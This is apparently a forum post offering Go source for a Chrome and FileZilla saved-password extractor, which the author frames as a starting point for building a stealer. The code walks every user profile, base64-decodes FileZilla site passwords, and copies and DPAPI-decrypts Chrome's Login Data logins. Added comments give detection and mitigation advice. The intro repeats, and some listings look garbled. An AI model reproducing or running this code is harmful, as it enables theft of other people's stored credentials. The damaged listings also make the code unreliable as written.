fernandopassword
Hello guys, I think everyone here knows the idea behind a browser password stealer... But for those who don't know:
It's software that opens the place where your favorite browser saves its passwords, decrypts them and sends them wherever you want.
Today I'm not going to show how to create a stealer, but how to create a recovery program (that you can use to make your own stealer) for Chrome and FileZilla.
The language I'll use is Golang, so you need to install it from https://golang.org/
The main Section is pretty simple
main.go
filezilla.go
chrome.go
utilidades.go
After creating these 4 files, just go to the directory and run go build.
That's it. Sorry for the Portuguese comments in the code and for my bad English, but I don't have time to translate them...
Any doubt Pm me or message me on Telegram:
@
It's software that opens the place where your favorite browser saves its passwords, decrypts them and sends them wherever you want.
Today I'm not going to show how to create a stealer, but how to create a recovery program (that you can use to make your own stealer) for Chrome and FileZilla.
The language I'll use is Golang, so you need to install it from https://golang.org/
The main Section is pretty simple
main.go
Code:
package main
// main drives one complete run of the tool. procura() fills the package-level
// users slice with profile directories, the FileZilla reader is then invoked
// inside a loop over that slice, and chrome() is called once at the end.
// Section banners and every recovered value are emitted through juntar.
//
// For defenders: the visible behaviour is a single process that reads the
// saved-credential stores of two unrelated applications in the same run,
// which is not something either application's own process does.
//
// NOTE(review): the page extraction appears to have dropped characters from
// this listing; the code is documented exactly as shown.
func main() {
	procura()
	juntar("****FTP****")
	for i := 0; i < len(users); i++ {
		filezilla(users)
	}
	juntar("****Chrome****")
	chrome()
}
Code:
package main
import (
"encoding/base64"
"encoding/xml"
"io/ioutil"
)
// filezilla reads FileZilla's Site Manager file from under the profile
// directory given in tratado (tratado + \AppData\Roaming\FileZilla\sitemanager.xml),
// parses it into an xmlfilezilla value and hands host, port, user and the
// decoded password to juntar.
//
// The only transformation applied to the stored password is
// base64.StdEncoding.DecodeString: no key or secret is involved. For
// defenders that means a sitemanager.xml in the form this code expects is
// readable by anything that can read the file. Mitigations to consider are
// FileZilla's master password option, not saving passwords in the Site
// Manager, and rotating any FTP/SFTP credentials that were stored on a host
// where untrusted code has run.
//
// A read failure is silently ignored (empty branch), and the error returned
// by xml.Unmarshal is discarded.
//
// NOTE(review): the page extraction appears to have dropped characters from
// this listing; the code is documented exactly as shown.
func filezilla(tratado string) {
	conteudo, erro := ioutil.ReadFile(tratado + "\\AppData\\Roaming\\FileZilla\\sitemanager.xml")
	if erro != nil {
		// Commented-out log call; the Portuguese strings read roughly
		// "in the folder of <user>, file does not exist".
		//juntar("Na Pasta do", usuario, "Arquivo n existe")
	} else {
		var arq xmlfilezilla
		var tamanho int
		xml.Unmarshal(conteudo, &arq)
		// The loop bound is the number of Host elements found in the file.
		tamanho = len(arq.Host)
		for i := 0; i < tamanho; i++ {
			juntar("Host:", arq.Host)
			juntar("Porta:", arq.Port)
			juntar("Usuario:", arq.User)
			// Plain base64 decode; when decoding fails the error value
			// itself is emitted in place of the password.
			sembase, nebase := base64.StdEncoding.DecodeString(arq.Pass)
			if nebase == nil {
				juntar("Senha:", string(sembase))
			} else {
				juntar("Senha:", nebase)
			}
		}
	}
	// process the content
}
Code:
//Chrome Password Recovery project main.go
//Recover Websites, Username and Passwords from Google Chromes Login Data file.
//Windows Only
//SQLLite3 - github.com/mattn/go-sqlite3
//Using Crypt32.dll (win32crypt) for decryption
//C:\Users\{USERNAME}\AppData\Local\Google\Chrome\User Data\Default
package main
import (
"database/sql"
//"fmt"
"io"
"log"
"os"
"syscall"
"unsafe"
_ "github.com/mattn/go-sqlite3"
)
var (
	// Lazily-loaded handles to the two Windows system DLLs this file calls into.
	dllcrypt32  = syscall.NewLazyDLL("Crypt32.dll")
	dllkernel32 = syscall.NewLazyDLL("Kernel32.dll")

	// CryptUnprotectData is the DPAPI decryption entry point; LocalFree
	// releases the output buffer that call allocates.
	procDecryptData = dllcrypt32.NewProc("CryptUnprotectData")
	procLocalFree   = dllkernel32.NewProc("LocalFree")

	// Location of the Default Chrome profile's "Login Data" file for the
	// user named by the USERPROFILE environment variable. For defenders: a
	// process other than the browser opening or copying this file is worth
	// alerting on.
	dataPath string = os.Getenv("USERPROFILE") + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
)
// DATA_BLOB is the Go-side layout of the length-plus-pointer structure that
// is passed to and filled in by CryptUnprotectData in Decrypt.
type DATA_BLOB struct {
	cbData uint32 // number of bytes at pbData
	pbData *byte  // first byte of the buffer; nil for an empty blob
}
// NewBlob wraps d in a DATA_BLOB without copying: pbData points at the first
// element of d and cbData holds its length. An empty or nil d yields a
// zero-valued blob (nil pointer, length 0).
func NewBlob(d []byte) *DATA_BLOB {
	blob := new(DATA_BLOB)
	if n := len(d); n > 0 {
		blob.cbData = uint32(n)
		blob.pbData = &d[0]
	}
	return blob
}
// ToByteArray returns a fresh Go slice holding a copy of the cbData bytes
// that pbData points to, so the result stays valid after the original buffer
// is released.
func (b *DATA_BLOB) ToByteArray() []byte {
	d := make([]byte, b.cbData)
	// pbData is reinterpreted as a pointer to a very large array so it can be
	// sliced; copy stops after len(d) bytes, so only cbData bytes are read.
	copy(d, (*[1 << 30]byte)(unsafe.Pointer(b.pbData))[:])
	return d
}
// Decrypt passes data to CryptUnprotectData (DPAPI) and returns the decrypted
// bytes. Only the input and output blobs are supplied; the five arguments in
// between are all zero.
//
// DPAPI decrypts with key material tied to the logged-on account, so this
// call works for any code running in that user's session without asking for
// a password. For defenders: once untrusted code has executed as a user,
// secrets protected this way for that user should be treated as exposed and
// rotated.
//
// Returns (nil, err) when the API reports failure (return value 0).
func Decrypt(data []byte) ([]byte, error) {
	var outblob DATA_BLOB
	r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outblob)))
	if r == 0 {
		return nil, err
	}
	// The output buffer is released with LocalFree after ToByteArray below
	// has copied it into a Go slice.
	defer procLocalFree.Call(uintptr(unsafe.Pointer(outblob.pbData)))
	return outblob.ToByteArray(), nil
}
// copyFileToDirectory copies the file at pathSourceFile to pathDestFile,
// creating or truncating the destination, and flushes it to disk.
//
// Any error from opening, creating, copying, syncing or stat-ing either file
// is returned as-is. After the copy the two file sizes are compared; note
// that on a mismatch the value returned is the error variable from the last
// successful Stat call, which is nil, so a size mismatch is not reported.
func copyFileToDirectory(pathSourceFile string, pathDestFile string) error {
	src, err := os.Open(pathSourceFile)
	if err != nil {
		return err
	}
	defer src.Close()

	dst, err := os.Create(pathDestFile)
	if err != nil {
		return err
	}
	defer dst.Close()

	if _, err = io.Copy(dst, src); err != nil {
		return err
	}
	if err = dst.Sync(); err != nil {
		return err
	}

	srcInfo, err := src.Stat()
	if err != nil {
		return err
	}
	dstInfo, err := dst.Stat()
	if err != nil {
		return err
	}

	if srcInfo.Size() != dstInfo.Size() {
		// err is nil at this point (both Stat calls succeeded).
		return err
	}
	return nil
}
// checkFileExist reports whether filePath can be stat-ed without a
// "does not exist" error. Any other Stat error (for example a permission
// problem) still yields true.
func checkFileExist(filePath string) bool {
	_, statErr := os.Stat(filePath)
	return !os.IsNotExist(statErr)
}
// chrome reads saved logins from the current user's Chrome "Login Data"
// file (dataPath): it copies the file to %APPDATA%\tempfile.dat, opens the
// copy as a SQLite database, selects origin_url, username_value and
// password_value from the logins table, runs each password_value through
// Decrypt (DPAPI) and passes the results to juntar.
//
// Observable behaviour that matters for detection and forensics:
//   - a non-browser process reads the Login Data file;
//   - a copy is written to %APPDATA%\tempfile.dat and nothing in this
//     function deletes it, so the copy remains on disk after the run;
//   - the process exits with status 0 and no output when the Login Data
//     file is absent, and terminates via log.Fatal on the first copy,
//     query, scan or decrypt error.
//
// NOTE(review): the file is presumably copied because the browser may hold
// the original open; the listing does not say so.
func chrome() {
	//Check for Login Data file
	if !checkFileExist(dataPath) {
		os.Exit(0)
	}
	//Copy Login Data file to temp location
	err := copyFileToDirectory(dataPath, os.Getenv("APPDATA")+"\\tempfile.dat")
	if err != nil {
		log.Fatal(err)
	}
	//Open Database
	db, err := sql.Open("sqlite3", os.Getenv("APPDATA")+"\\tempfile.dat")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()
	//Select Rows to get data from
	rows, err := db.Query("select origin_url, username_value, password_value from logins")
	if err != nil {
		log.Fatal(err)
	}
	defer rows.Close()
	for rows.Next() {
		var URL string
		var USERNAME string
		// password_value is scanned into a Go string and converted back to
		// bytes for Decrypt below.
		var PASSWORD string
		err = rows.Scan(&URL, &USERNAME, &PASSWORD)
		if err != nil {
			log.Fatal(err)
		}
		//Decrypt Passwords
		pass, err := Decrypt([]byte(PASSWORD))
		if err != nil {
			log.Fatal(err)
		}
		//Check if no value, if none skip
		// The condition tests URL twice; USERNAME is never checked.
		if URL != "" && URL != "" && string(pass) != "" {
			juntar(URL, USERNAME, string(pass))
		}
	}
	err = rows.Err()
	if err != nil {
		log.Fatal(err)
	}
}
Code:
package main
import (
"encoding/xml"
"fmt"
"io/ioutil"
"os"
)
// the step-by-step will be: enumerate users, collect from FileZilla and from WinSCP
// I need to replace the prints with output to a file

// xmlfilezilla is the decode target for FileZilla's sitemanager.xml. Each
// slice gathers one element (Host, Port, User, Pass) from every
// Servers>Server entry under the FileZilla3 root, so entries are matched
// across the four slices by position.
type xmlfilezilla struct {
	XMLNAME xml.Name `xml:"FileZilla3"`
	Host    []string `xml:"Servers>Server>Host"`
	Port    []string `xml:"Servers>Server>Port"`
	User    []string `xml:"Servers>Server>User"`
	Pass    []string `xml:"Servers>Server>Pass"`
}
// users collects the profile directory paths found by procura.
var users []string

// pastadouser holds the most recent profile path built inside procura's loop.
var pastadouser string
// procura lists the \Users directory on the drive named by the HOMEDRIVE
// environment variable and appends the full path of every sub-directory to
// the package-level users slice. No filtering is applied, so every directory
// entry is included. The ReadDir error is discarded; on failure the loop
// simply runs zero times.
//
// For defenders: the later per-profile reads mean one process probes the
// same AppData path under every profile on the machine, which stands out
// against normal per-user application behaviour.
// NOTE(review): whether other users' profiles are actually readable depends
// on the privileges the process runs with; not determinable from this code.
func procura() {
	pasta := os.Getenv("HOMEDRIVE")
	raiz, _ := ioutil.ReadDir(pasta + "\\Users") // this is the crudest possible solution, since Windows has no support for lookgroups
	for _, user := range raiz {
		//juntar(user.Name())
		if user.IsDir() {
			pastadouser = pasta + "\\Users\\" + user.Name()
			users = append(users, pastadouser)
			//filezilla(pastadouser)
			//juntar(users)
		}
	}
}
// placeholder function for handling the sending of files; initially it can be just a print
// it will build an array with all the information so everything can be printed afterwards
//
// juntar is the single output sink used by the rest of the program. As
// written it only prints its arguments, as one slice, to standard output.
func juntar(a ...interface{}) {
	fmt.Println(a)
}
That's it. Sorry for the Portuguese comments in the code and for my bad English, but I don't have time to translate them...
Any doubt Pm me or message me on Telegram:
@